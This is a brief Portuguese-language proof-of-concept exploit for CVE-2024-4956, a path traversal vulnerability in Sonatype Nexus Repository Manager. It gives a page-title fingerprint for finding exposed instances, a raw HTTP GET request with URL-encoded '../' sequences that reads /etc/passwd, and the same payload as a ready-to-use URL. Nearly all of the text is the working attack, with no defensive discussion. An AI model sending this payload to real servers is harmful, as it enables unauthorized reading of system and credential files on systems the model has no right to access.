
Exploit de prova de conceito para o CVE-2024-4956, uma vulnerabilidade de path traversal no Sonatype Nexus Repository Manager, que permite leitura não autorizada de arquivos através de requisições HTTP maliciosas.
title="Gerenciador de Repositório Nexus"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
http://x.x.x.x/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
